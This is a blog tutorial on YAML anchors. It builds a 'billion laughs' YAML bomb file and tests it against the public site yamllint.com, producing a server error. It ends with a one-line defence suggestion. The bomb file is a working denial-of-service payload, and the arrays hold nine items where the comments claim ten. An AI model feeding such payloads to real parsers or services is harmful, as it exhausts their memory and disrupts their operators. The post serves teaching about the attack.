DEV Community

Efrat
Efrat

Posted on

The billion laughs attack: YAML anchors explained

Disclaimer: this post is published for learning purposes, I do not encourage anyone to attack anything. (and this attack probably wont work on any modern system anyway).

This post addresses people who are already familiar with basic YAML but wish to know more. If you don't know yaml at all- I found a great intro for you. Come back when you are done.

YAML Anchors βš“

YAML is a superset of JSON -
meaning you can convert JSON to YAML but not always vice versa, because over the years YAML got added tons of features and rules, that made it way more complicated than JSON. (thats both bad and good, I agree 😬)

One of YAML's cool features is anchors. Its like a reference to another object in the file, so you don't have to repeat yourself. If you are familiar with pointers of any language, the idea is not new for you. (yay 😁). Basically it means you declare a variable, assign it an anchor (with the & in front of it), and than you can refer to the anchor with *, and that reference will be interpreted as the variable itself. ☝️

Enough talking, Time for an Example:

# variable:       anchore          value
#   |               |               |
#   V               V               V
octopus: &anchor_to_the_octopus Aristotle

the_addams_family:
- Morticia
- Gomez
- Wednesday
- Pugsley
- *anchor_to_the_octopus

This mess will be interpreted as:

octopus: Aristotle
the_addams_family:
- Morticia
- Gomez
- Wednesday
- Pugsley
- Aristotle

If this post goes well and I get tons of followers on twitter I'll do my best to make another one which will explain how to merge YAML lists so I get to add the rest of the Addams family up here. πŸ’€ πŸ’€ πŸ’€ I swear

So far so good. Now what are we building?

The Billion Laughs Bomb πŸ’£ - Recursive Interpretation Attacks:

The idea is actually very old, in its former variations such as ZIP bomb, fork bomb, and XML bomb have been around for years.

The common concept here is to create a program that once be interpreted by the machine, will start consuming an unexpected amount of memory (and cause a Denial of Service, if the year was 2002 & earlier).

The billion laughs attack takes an exponential amount of space. The quadratic blowup variation causes quadratic growth in storage requirements by simply repeating a large entity over and over again, to avoid countermeasures that detect heavily nested entities

(thats from wikipedia. ;)

Lets build such bomb file using the yaml anchors we got introduced to. dont freak out please- the idea is exactly the same, but it looks trickier:

bomb.yaml

# lol-one is a single laugh:
lol1: &lol1 "lol" 
# a var, an anchor, and a value, remember?

# lol-2 is an array of 10 lol-one's:
lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1] 
# a var, an anchor and a value.
# the value just happened to be an array of 10 anchors to lol1.
# thats completely legal in yaml.


# an array of 10 arrays of 10 laughs: (right, thats 100 laughs)
lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2]

# well, you got the idea:
lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3]
lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4]
lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5]
lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6]
lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7]
lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8]
lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]

Looking good- lol10 will actually be interpreted as 10^9 = 1,000,000,000 lols, and our billion laughs bomb is fully armed and ready for a test.

I'm going to make my PoC using yamllint.com. its a great place to validate your yaml files, lets give it a dry round:

dry-before

And click the little go button. looks like that one is successfully interpreted:

dry-after

Now lets try the bomb:
bomb-before

And- (it takes a while): OUCH! (ha ha)

Alt Text

Now, of course we actually didn't cause yamllint.com any damage, since the server is supposed to limit the memory consumed by my request. what happened here is that the server was trying to parse the yaml for us, but consumed too much memory, the process got killed by the system and we got back the 500 error.

How to defend my own system from this kind of nasty attacks?

The obvious solution, of course, is to cup the amount of memory that the program may consume, so it wont eat up the entire RAM.

Recap:

So we know the bomb works, better not try it on your favourite machine. I suppose this post isn't an extremely useful one but I hope you still enjoyed reading it.

Tweet me any time if you got any farther questions @EfratLevitan

Cheers!

Who am I?

My name's Efrat πŸ‘§, I will turn 21 this winter. I πŸ’“ tech, linux machines and cool coding languages. Currently I am a DevOps at a company called Yad2. Most of my time I work with 🐳 & Kubernetes over aws cloud. follow meβœ‹

Top comments (0)